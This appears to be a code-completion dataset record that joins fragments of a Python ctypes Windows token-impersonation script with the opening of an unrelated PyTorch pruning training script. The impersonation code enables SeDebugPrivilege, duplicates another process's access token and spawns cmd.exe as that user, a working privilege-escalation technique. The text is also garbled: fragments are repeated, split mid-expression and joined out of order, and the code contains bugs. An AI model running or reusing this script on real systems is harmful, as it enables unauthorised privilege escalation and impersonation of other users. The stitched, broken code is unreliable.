from ctypes.wintypes import DWORD,BOOL,HANDLE,LPWSTR,WORD,LPBYTE
# Handles
u_handle = ctypes.WinDLL("user32.dll")
k_handle = ctypes.WinDLL("kernel32.dll")
a_handle = ctypes.WinDLL("Advapi32.dll")
# Access Rights (Full Access Right Shortcut)
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
# Privilege Enabled Mask
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_DISABLED = 0x00000000
# Token Access Rights
STANDARD_RIGHTS_REQUIRED = 0x000F0000
STANDARD_RIGHTS_READ = 0x00020000
TOKEN_ASSIGN_PRIMARY = 0x0001
TOKEN_DUPLICATE = 0x0002
TOKEN_IMPERSONATION = 0x0004
TOKEN_QUERY = 0x0008
TOKEN_QUERY_SOURCE = 0x0010
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_ADJUST_GROUPS = 0x0040
TOKEN_ADJUST_DEFAULT = 0x0080
TOKEN_ADJUST_SESSIONID = 0x0100
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
TOKEN_ALL_ACCESS = ( STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY | | TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
# LUID Structure
class LUID(ctypes.Structure):
_fields_ = [
("LowPart", DWORD),
("HighPart", DWORD),
]
# LUID and ATTRIBUTES
class LUID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("Luid", LUID),
("Attributes", DWORD),
]
# Privilege Set
class PRIVILEGE_SET(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Control", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Token Set
class TOKEN_PRIVILEGES(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Security Attribute Set
class SECURITY_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("nLength", DWORD),
("lpSecurityDescriptor", HANDLE),
("nInheritHandle", BOOL),
]
# Structure for Star
class STARTUPINFO(ctypes.Structure):
_fields_ = [
("cb", DWORD),
("lpReserved", LPWSTR),
("lpDesktop", LPWSTR),
("lpTitle", LPWSTR),
("dwX", DWORD),
("dwY", DWORD),
("dwXSize", DWORD),
("dwYSize", DWORD),
("dwXCountChars", DWORD),
("dwYCountChars", DWORD),
("dwFillAttribute", DWORD),
("dwFlags", DWORD),
("wShowWindow", WORD),
("cbReserved2", WORD),
("lpReserved2", LPBYTE),
("hStdInput", HANDLE),
("hStdOutput", HANDLE),
("hStdError", HANDLE),
]
# Structure for Process Info
class PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
("hProcess", HANDLE),
("hThread", HANDLE),
("dwProcessId", DWORD),
("dwThreadId", DWORD),
]
# [FUNCTION] Enable Privileges
def enablePrivilege(priv, handle):
# 1) Use the LookupPrivilegeValueW API Call to get the LUID based on the String Privilege Name
# 2) Setup a PRIVILEGE_SET for the PrivilegeCheck Call to be used later - We need the LUID to be used
# BOOL PrivilegeCheck(
# HANDLE ClientToken,
# PPRIVILEGE_SET RequiredPrivileges,
# LPBOOL pfResult
# );
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1 # We are only looking at 1 privilege at a time
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES() # Setup a new LUID_AND_ATTRIBUTES
requiredPrivileges.Privileges.Luid = LUID() # Setup a new LUID inside of the LUID_AND_ATTRIBUTES structure
# BOOL LookupPrivilegeValueW(
# LPCWSTR lpSystemName,
# LPCWSTR lpName,
# PLUID lpLuid
# );
lpSystemName = None
lpName = priv
# Issue the call to configure the LUID with the Systems Value of that privilege
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(requiredPrivileges.Privileges.Luid))
# Error Handling
if response > 0:
print("[INFO] Privilege Adjustment Success: {0}".format(priv))
else:
print("[ERROR] Privilege Adjustment Failed: {0}. [-] Error Code: {a}".format(priv, k_handle.GetLastError()))
return 1
# Check if the correct privilege is enabled
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
# Error Handling
if response > 0:
print("[INFO] PrivilegeCheck Success!")
else:
print("[ERROR] PrivilegeCheck Failed! [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
if pfResult:
print("[INFO] Privilege Enabled: {0}".format(priv))
return 0
else:
print("[INFO] Privilege Disabled: {0}".format(priv))
# Enabling the privilege if disabled
print("[INFO] Enabling the Privilege...")
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
# BOOL AdjustTokenPrivileges(
# HANDLE TokenHandle,
# BOOL DisableAllPrivileges,
# PTOKEN_PRIVILEGES NewState,
# DWORD BufferLength,
# PTOKEN_PRIVILEGES PreviousState,
# PDWORD ReturnLength
# );
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength = ctypes.c_void_p()
# Configure Token Privilege
NewState.PrivilegeCount = 1;
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
# Error Handling
if response > 0:
print("[INFO] AdjustTokenPrivileges Enabled: {0}".format(priv))
else:
print("[ERROR] AdjustTokenPrivileges Disabled: {0}. [-] Error Code: {0}".format(priv, k_handle.GetLastError()))
return 1
return 0
# [FUNCTION] Open Process
def openProcessByPID(pid):
# HANDLE OpenProcess(
# DWORD dwDesiredAccess,
# BOOL bInheritHandle,
# DWAORD dwProcessId
# );
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = pid
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
# Error Handling
if hProcess <= 0:
print("[Error] No Privilieged Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
else:
print("[INFO] OpenProcess Handle Obtained:", hProcess)
return hProcess
# [FUNCTION] Open a Process Token
def openProcToken(pHandle):
# BOOL OpenProcessToken(
# HANDLE ProcessHandle,
# DWORD DesiredAccess,
# PHANDLE TokenHandle
# );
ProcessHandle = pHandle
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
# Error Handling
if response > 0:
print("[INFO] OpenProcess Token Obtained: {0}".format(TokenHandle))
return TokenHandle
else:
print("[ERROR] No Privilieged Token Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
# ============================================================================================================
# Grab the Windows Name from User32
lpClassName = None
lpWindowName = ctypes.c_char_p((input("[INPUT] Enter Window Name to Hook Into: ").encode('utf-8')))
# Grab a Handle to the Process
hWnd = u_handle.FindWindowA(lpClassName, lpWindowName)
# Error Handling
if hWnd == 0:
print("[ERROR] No Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Handle Obtained: {0}".format(hWnd))
# Get the PID of the Process at the Handle
# DWORD GetWindowThreadProcessId(
# HWND hWnd,
# LPDWORD lpdwProcessId
# );
lpdwProcessId = ctypes.c_ulong()
# Use byref to pass a pointer to the value as needed by the API Call
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
# Error Handling
if hWnd == 0:
print("[Error] No PID Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
else:
pid = str(lpdwProcessId)
print("[INFO] PID Obtained:", pid.strip("c_ulong()"))
# Open the Process and Grab a Table to its Token
print("[INFO] Getting TokenHandle...")
TokenHandle = openProcToken(openProcessByPID(lpdwProcessId))
# Get Handle of Current Process
print("[INFO] Getting CurrentProcessHandle...")
currentProcessHandle = openProcToken(openProcessByPID(k_handle.GetCurrentProcessId()))
# Attempt to Enable SeDebugPrivilege on Current Process to be able to use token duplication
print("[INFO] Enabling SEDebugPrivilege on Current Process...")
response = enablePrivilege("SEDebugPrivilege", currentProcessHandle)
if response != 0:
print("[ERROR] Failed to Enable Privileges!")
exit(1)
# Duplicate Token On Hooked Process
hExistingToken = ctypes.c_void_p()
dwDesiredAccess = TOKEN_ALL_ACCESS
lpTokenAttributes = SECURITY_ATTRIBUTES()
ImpersonationLevel = 2 # Set to SecurityImpersonation Enum
TokenType = 1 # Set to Token_Type enum as Primary
# Configure the SECURITY_ATTRIBUTES Structure
lpTokenAttributes.bInheritHandle = False
lpTokenAttributes.lpSecurityDescriptor = ctypes.c_void_p()
lpTokenAttributes.nLength = ctypes.sizeof(lpTokenAttributes)
print("[INFO] Duplicating Token on Hooked Process...")
# Issue the Token Duplication Call
response = a_handle.DuplicateTokenEx(
TokenHandle,
dwDesiredAccess,
ctypes.byref(lpTokenAttributes),
ImpersonationLevel,
TokenType,
ctypes.byref(hExistingToken))
if response == 0:
print("[ERROR] Duplicating Token Failed [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
# Spawn a Process as the Impersonated User
# CreateProcessWithTokenW
hToken = hExistingToken
dwLogonFlags = 0x00000001 # Use the Flag LOGON_WITH_PROFILE
lpApplicationName = "C:\\Windows\\System32\\cmd.exe"
lpCommandLine = None
dwCreationFlags = 0x00000010 # Use the Flag CREATE_NEW_CONSOLE
lpEnvironment = ctypes.c_void_p()
lpCurrentDirectory = None
lpStartupInfo = STARTUPINFO()
lpProcessInformation = PROCESS_INFORMATION()
# StartupInfo (*If I don't sepcify the value, it will return as NULL)
lpStartupInfo.wShowWindow = 0x1 # Showing up Windows
lpStartupInfo.dwFlags = 0x1 # Use to flag to look at wShowWindow
lpStartupInfo.cb = ctypes.sizeof(lpStartupInfo)
response = a_handle.CreateProcessWithTokenW(
hToken,
dwLogonFlags,
lpApplicationName,
lpCommandLine,
dwCreationFlags,
lpEnvironment,
lpCurrentDirectory,
ctypes.byref(lpStartupInfo), # Pointer to STARTUPINFOA
ctypes.byref(lpProcessInformation)) # Pointer to PROCESS_INFORMATION
if response == 0:
print("[ERROR] Failed to Create a Process with Duplicated Token [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Created Impersonated Process!") | TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE | | random_line_split |
09_impersonator.py | # impersonator.py
import ctypes
from ctypes.wintypes import DWORD,BOOL,HANDLE,LPWSTR,WORD,LPBYTE
# Handles
u_handle = ctypes.WinDLL("user32.dll")
k_handle = ctypes.WinDLL("kernel32.dll")
a_handle = ctypes.WinDLL("Advapi32.dll")
# Access Rights (Full Access Right Shortcut)
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
# Privilege Enabled Mask
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_DISABLED = 0x00000000
# Token Access Rights
STANDARD_RIGHTS_REQUIRED = 0x000F0000
STANDARD_RIGHTS_READ = 0x00020000
TOKEN_ASSIGN_PRIMARY = 0x0001
TOKEN_DUPLICATE = 0x0002
TOKEN_IMPERSONATION = 0x0004
TOKEN_QUERY = 0x0008
TOKEN_QUERY_SOURCE = 0x0010
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_ADJUST_GROUPS = 0x0040
TOKEN_ADJUST_DEFAULT = 0x0080
TOKEN_ADJUST_SESSIONID = 0x0100
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
TOKEN_ALL_ACCESS = ( STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
# LUID Structure
class LUID(ctypes.Structure):
_fields_ = [
("LowPart", DWORD),
("HighPart", DWORD),
]
# LUID and ATTRIBUTES
class LUID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("Luid", LUID),
("Attributes", DWORD),
]
# Privilege Set
class PRIVILEGE_SET(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Control", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Token Set
class TOKEN_PRIVILEGES(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Security Attribute Set
class SECURITY_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("nLength", DWORD),
("lpSecurityDescriptor", HANDLE),
("nInheritHandle", BOOL),
]
# Structure for Star
class STARTUPINFO(ctypes.Structure):
_fields_ = [
("cb", DWORD),
("lpReserved", LPWSTR),
("lpDesktop", LPWSTR),
("lpTitle", LPWSTR),
("dwX", DWORD),
("dwY", DWORD),
("dwXSize", DWORD),
("dwYSize", DWORD),
("dwXCountChars", DWORD),
("dwYCountChars", DWORD),
("dwFillAttribute", DWORD),
("dwFlags", DWORD),
("wShowWindow", WORD),
("cbReserved2", WORD),
("lpReserved2", LPBYTE),
("hStdInput", HANDLE),
("hStdOutput", HANDLE),
("hStdError", HANDLE),
]
# Structure for Process Info
class PROCESS_INFORMATION(ctypes.Structure):
|
# [FUNCTION] Enable Privileges
def enablePrivilege(priv, handle):
# 1) Use the LookupPrivilegeValueW API Call to get the LUID based on the String Privilege Name
# 2) Setup a PRIVILEGE_SET for the PrivilegeCheck Call to be used later - We need the LUID to be used
# BOOL PrivilegeCheck(
# HANDLE ClientToken,
# PPRIVILEGE_SET RequiredPrivileges,
# LPBOOL pfResult
# );
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1 # We are only looking at 1 privilege at a time
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES() # Setup a new LUID_AND_ATTRIBUTES
requiredPrivileges.Privileges.Luid = LUID() # Setup a new LUID inside of the LUID_AND_ATTRIBUTES structure
# BOOL LookupPrivilegeValueW(
# LPCWSTR lpSystemName,
# LPCWSTR lpName,
# PLUID lpLuid
# );
lpSystemName = None
lpName = priv
# Issue the call to configure the LUID with the Systems Value of that privilege
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(requiredPrivileges.Privileges.Luid))
# Error Handling
if response > 0:
print("[INFO] Privilege Adjustment Success: {0}".format(priv))
else:
print("[ERROR] Privilege Adjustment Failed: {0}. [-] Error Code: {a}".format(priv, k_handle.GetLastError()))
return 1
# Check if the correct privilege is enabled
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
# Error Handling
if response > 0:
print("[INFO] PrivilegeCheck Success!")
else:
print("[ERROR] PrivilegeCheck Failed! [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
if pfResult:
print("[INFO] Privilege Enabled: {0}".format(priv))
return 0
else:
print("[INFO] Privilege Disabled: {0}".format(priv))
# Enabling the privilege if disabled
print("[INFO] Enabling the Privilege...")
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
# BOOL AdjustTokenPrivileges(
# HANDLE TokenHandle,
# BOOL DisableAllPrivileges,
# PTOKEN_PRIVILEGES NewState,
# DWORD BufferLength,
# PTOKEN_PRIVILEGES PreviousState,
# PDWORD ReturnLength
# );
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength = ctypes.c_void_p()
# Configure Token Privilege
NewState.PrivilegeCount = 1;
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
# Error Handling
if response > 0:
print("[INFO] AdjustTokenPrivileges Enabled: {0}".format(priv))
else:
print("[ERROR] AdjustTokenPrivileges Disabled: {0}. [-] Error Code: {0}".format(priv, k_handle.GetLastError()))
return 1
return 0
# [FUNCTION] Open Process
def openProcessByPID(pid):
# HANDLE OpenProcess(
# DWORD dwDesiredAccess,
# BOOL bInheritHandle,
# DWAORD dwProcessId
# );
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = pid
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
# Error Handling
if hProcess <= 0:
print("[Error] No Privilieged Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
else:
print("[INFO] OpenProcess Handle Obtained:", hProcess)
return hProcess
# [FUNCTION] Open a Process Token
def openProcToken(pHandle):
# BOOL OpenProcessToken(
# HANDLE ProcessHandle,
# DWORD DesiredAccess,
# PHANDLE TokenHandle
# );
ProcessHandle = pHandle
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
# Error Handling
if response > 0:
print("[INFO] OpenProcess Token Obtained: {0}".format(TokenHandle))
return TokenHandle
else:
print("[ERROR] No Privilieged Token Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
return 1
# ============================================================================================================
# Grab the Windows Name from User32
lpClassName = None
lpWindowName = ctypes.c_char_p((input("[INPUT] Enter Window Name to Hook Into: ").encode('utf-8')))
# Grab a Handle to the Process
hWnd = u_handle.FindWindowA(lpClassName, lpWindowName)
# Error Handling
if hWnd == 0:
print("[ERROR] No Handle Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Handle Obtained: {0}".format(hWnd))
# Get the PID of the Process at the Handle
# DWORD GetWindowThreadProcessId(
# HWND hWnd,
# LPDWORD lpdwProcessId
# );
lpdwProcessId = ctypes.c_ulong()
# Use byref to pass a pointer to the value as needed by the API Call
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
# Error Handling
if hWnd == 0:
print("[Error] No PID Obtained... [-] Error Code: {0}".format(k_handle.GetLastError()))
else:
pid = str(lpdwProcessId)
print("[INFO] PID Obtained:", pid.strip("c_ulong()"))
# Open the Process and Grab a Table to its Token
print("[INFO] Getting TokenHandle...")
TokenHandle = openProcToken(openProcessByPID(lpdwProcessId))
# Get Handle of Current Process
print("[INFO] Getting CurrentProcessHandle...")
currentProcessHandle = openProcToken(openProcessByPID(k_handle.GetCurrentProcessId()))
# Attempt to Enable SeDebugPrivilege on Current Process to be able to use token duplication
print("[INFO] Enabling SEDebugPrivilege on Current Process...")
response = enablePrivilege("SEDebugPrivilege", currentProcessHandle)
if response != 0:
print("[ERROR] Failed to Enable Privileges!")
exit(1)
# Duplicate Token On Hooked Process
hExistingToken = ctypes.c_void_p()
dwDesiredAccess = TOKEN_ALL_ACCESS
lpTokenAttributes = SECURITY_ATTRIBUTES()
ImpersonationLevel = 2 # Set to SecurityImpersonation Enum
TokenType = 1 # Set to Token_Type enum as Primary
# Configure the SECURITY_ATTRIBUTES Structure
lpTokenAttributes.bInheritHandle = False
lpTokenAttributes.lpSecurityDescriptor = ctypes.c_void_p()
lpTokenAttributes.nLength = ctypes.sizeof(lpTokenAttributes)
print("[INFO] Duplicating Token on Hooked Process...")
# Issue the Token Duplication Call
response = a_handle.DuplicateTokenEx(
TokenHandle,
dwDesiredAccess,
ctypes.byref(lpTokenAttributes),
ImpersonationLevel,
TokenType,
ctypes.byref(hExistingToken))
if response == 0:
print("[ERROR] Duplicating Token Failed [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
# Spawn a Process as the Impersonated User
# CreateProcessWithTokenW
hToken = hExistingToken
dwLogonFlags = 0x00000001 # Use the Flag LOGON_WITH_PROFILE
lpApplicationName = "C:\\Windows\\System32\\cmd.exe"
lpCommandLine = None
dwCreationFlags = 0x00000010 # Use the Flag CREATE_NEW_CONSOLE
lpEnvironment = ctypes.c_void_p()
lpCurrentDirectory = None
lpStartupInfo = STARTUPINFO()
lpProcessInformation = PROCESS_INFORMATION()
# StartupInfo (*If I don't sepcify the value, it will return as NULL)
lpStartupInfo.wShowWindow = 0x1 # Showing up Windows
lpStartupInfo.dwFlags = 0x1 # Use to flag to look at wShowWindow
lpStartupInfo.cb = ctypes.sizeof(lpStartupInfo)
response = a_handle.CreateProcessWithTokenW(
hToken,
dwLogonFlags,
lpApplicationName,
lpCommandLine,
dwCreationFlags,
lpEnvironment,
lpCurrentDirectory,
ctypes.byref(lpStartupInfo), # Pointer to STARTUPINFOA
ctypes.byref(lpProcessInformation)) # Pointer to PROCESS_INFORMATION
if response == 0:
print("[ERROR] Failed to Create a Process with Duplicated Token [-] Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("[INFO] Created Impersonated Process!")
| _fields_ = [
("hProcess", HANDLE),
("hThread", HANDLE),
("dwProcessId", DWORD),
("dwThreadId", DWORD),
] | identifier_body |
main.py | from __future__ import print_function
import os
import sys
import logging
import argparse
import time
from time import strftime
import torch
import torch.optim as optim
from torchvision import datasets, transforms
from models.resnet_1d import ResNet18_1d, ResNet34_1d, ResNet50_1d
import admm
from admm import GradualWarmupScheduler
from admm import CrossEntropyLossMaybeSmooth
from admm import mixup_data, mixup_criterion
from testers import *
from TrainValTest import TrainValTest
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def check_and_create(dir_path):
if os.path.exists(dir_path):
return True
else:
os.makedirs(dir_path)
return False
# Training settings
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 admm training')
parser.add_argument('--logger', action='store_true', default=True,
help='whether to use logger')
parser.add_argument('--arch', type=str, default=None,
help='[vgg, resnet, convnet, alexnet]')
parser.add_argument('--depth', default=None, type=int,
help='depth of the neural network, 16,19 for vgg; 18, 50 for resnet')
parser.add_argument('--s', type=float, default=0.0001,
help='scale sparse rate (default: 0.0001)')
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--multi-gpu', action='store_true', default=False,
help='for multi-gpu training')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=256, metavar='N',
help='input batch size for testing (default: 256)')
parser.add_argument('--epochs', type=int, default=100, metavar='N',
help='number of epochs to train (default: 160)')
parser.add_argument('--admm-epochs', type=int, default=1, metavar='N',
help='number of interval epochs to update admm (default: 1)')
parser.add_argument('--optmzr', type=str, default='sgd', metavar='OPTMZR',
help='optimizer used (default: adam)')
parser.add_argument('--lr', type=float, default=0.001, metavar='LR',
help='learning rate (default: 0.1)')
parser.add_argument('--lr-decay', type=int, default=30, metavar='LR_decay',
help='how many every epoch before lr drop (default: 30)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=100, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--load-model', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--load-mask', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--save-model', type=str, default="",
help='For Saving the current Model')
parser.add_argument('--masked-retrain', action='store_true', default=False,
help='for masked retrain')
parser.add_argument('--verbose', action='store_true', default=True,
help='whether to report admm convergence condition')
parser.add_argument('--admm', action='store_true', default=False,
help="for admm training")
parser.add_argument('--rho', type=float, default = 0.0001,
help ="define rho for ADMM")
parser.add_argument('--rho-num', type=int, default = 5,
help ="define how many rohs for ADMM training")
parser.add_argument('--sparsity-type', type=str, default='random-pattern',
help ="define sparsity_type: [irregular,column,filter,pattern,random-pattern]")
parser.add_argument('--config-file', type=str, default='config_vgg16',
help ="config file name")
parser.add_argument('--combine-progressive', default=False, type=str2bool,
help="for filter pruning after column pruning")
parser.add_argument('--purification', default=False, type=str2bool,
help="purification after pruning")
parser.add_argument('--lr-scheduler', type=str, default='default',
help='define lr scheduler')
parser.add_argument('--warmup', action='store_true', default=False,
help='warm-up scheduler')
parser.add_argument('--warmup-lr', type=float, default=0.0001, metavar='M',
help='warmup-lr, smaller than original lr')
parser.add_argument('--warmup-epochs', type=int, default=0, metavar='M',
help='number of epochs for lr warmup')
parser.add_argument('--mixup', action='store_true', default=False,
help='ce mixup')
parser.add_argument('--alpha', type=float, default=0.0, metavar='M',
help='for mixup training, lambda = Beta(alpha, alpha) distribution. Set to 0.0 to disable')
parser.add_argument('--smooth', action='store_true', default=False,
help='lable smooth')
parser.add_argument('--smooth-eps', type=float, default=0.0, metavar='M',
help='smoothing rate [0.0, 1.0], set to 0.0 to disable')
parser.add_argument('--no-tricks', action='store_true', default=False,
help='disable all training tricks and restore original classic training process')
########### From RFMLS: multi-gpu; batch-size
parser.add_argument('--exp_name', default='exp1', type=str, help='Specify the experiment name')
parser.add_argument('--base_path', default='/scratch/RFMLS/dataset100/dataset_with_val_9000train/', type=str, help='Specify the base path')
parser.add_argument('--save_path', default='/scratch/zhou.fan1/filtered/', type=str, help='Specify the save path')
parser.add_argument('--file_type', default='mat', type=str, help='Specify type of file you want to read')
parser.add_argument('--decimated', default=False, type=str2bool, help='Specify if the data in the files is decimated, if so and you are using the same stats file as the undecimated then the generator will take this into account')
parser.add_argument('--val_from_train', default=False, type=str2bool, help='If validation not present in partition file, generate one from the training set. (If false, use test set as validation)')
parser.add_argument('--test_on_val_set',default=False, type=str2bool, help='If true it will test the trained model on validation data, for tuning hyperparameters')
parser.add_argument('--train', default=False, type=str2bool, help='Specify doing training or not')
parser.add_argument('-ss', '--slice_size', default=1024, type=int, help='Specify the slice size')
parser.add_argument('-d', '--devices', default=100, type=int, help='Specify the number of total devices')
parser.add_argument('--cnn_stack', default=3, type=int, help='[Baseline Model] Specify the number of cnn layers')
parser.add_argument('--fc_stack', default=2, type=int, help='[Baseline Model] Specify the number of fc layers')
parser.add_argument('--channels', default=128, type=int, help='[Baseline Model] Specify the number of channels of cnn')
parser.add_argument('--fc1', default=256, type=int, help='[Baseline Model] Specify the number of neurons in the first fc layer')
parser.add_argument('--fc2', default=128, type=int, help='[Baseline Model] Specify the number of neurons in the penultimate fc layer')
# Data Generator
parser.add_argument('--generator', default='new', type=str, help='Specify which generator to use')
parser.add_argument('--add_padding', default=False, type=str2bool, help='If examples are smaller than slice size addpadding')
parser.add_argument('--padding_type', default='zero', type=str, help='"zero"-padding and "stride"-padding')
parser.add_argument('--try_concat', default=False, type=str2bool, help='If examples are smaller than slice size and using demodulated data, try and concat them')
parser.add_argument('--preprocessor', default='no', type=str, help='Specify which preprocessor to use')
parser.add_argument('--K', default=1, type=int, help='Specify the batch down sampling factor K')
parser.add_argument('-fpio', '--files_per_IO', default=500000, type = int, help='Specify the files loaded to memory per IO')
parser.add_argument('--shrink', default=1, type=float, help='Dataset down sampling factor')
parser.add_argument('--normalize', default='True', type=str2bool, help='Specify if you want to normalize the data using mean and std in stats files (if stats does not have this info, it is ignored)')
parser.add_argument('--crop', default=0, type=int, help='if crop > 0 the generator crops the examples to a maximum length of crop')
parser.add_argument('--training_strategy', default='big', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--sampling', default='model', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--fir_size', default=11, type=int, help='FIR filter size.')
parser.add_argument('--use_preamble', default=False, type=str2bool, help='Using preamble to train channel-removing filter')
parser.add_argument('--merge_preamble', default=False, type=str2bool, help='Merge preamble with slice to train channel-removing filter')
parser.add_argument('--id_gpu', default=0, type=int, help='If --multigpu=False, this arguments specify which gpu to use.')
parser.add_argument('--test_stride', default=16, type=int, help='Specify the stride to use for testing')
parser.add_argument('--per_example_strategy', default='prob_sum', type=str, help='Specify the strategy used to compute the per wxample accuracy: (majority, prob_sum, log_prob_sum, all)')
################## augmentation parameters #####################
parser.add_argument('--aug_var', default='0.0434', type=float, help='variance of noise for data augmentation')
parser.add_argument('--aug_mean', default='0.045', type=float, help='mean of noise for data augmentation')
parser.add_argument('--aug_taps', default=11, type=int, help='Number of complex taps for data augmentation')
parser.add_argument('--aug_granularity', default='per_ex', type=str, help='granularity of fir selection for training pipelinecan be per_ex, per_batch, per_slice')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
torch.cuda.manual_seed(args.seed)
use_cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
kwargs = {'num_workers': args.workers, 'pin_memory': True} if args.cuda else {}
writer = None
print('Use Cuda:',use_cuda)
# ------------------ save path ----------------------------------------------
args.save_path_exp = args.save_path
check_and_create(args.save_path_exp)
setting_file = os.path.join(args.save_path_exp, args.exp_name+'.config')
print("*************** Configuration ***************")
with open(setting_file, 'w') as f:
args_dic = vars(args)
for arg, value in args_dic.items():
line = arg + ' : ' + str(value)
print(line)
f.write(line+'\n')
### Data Loader ###
pipeline = TrainValTest(base_path=args.base_path, save_path=args.save_path_exp,
val_from_train=args.val_from_train)
pipeline.load_data(sampling=args.sampling)
train_loader = pipeline.GenerateData(args.batch_size, args.slice_size, args.K, args.files_per_IO,
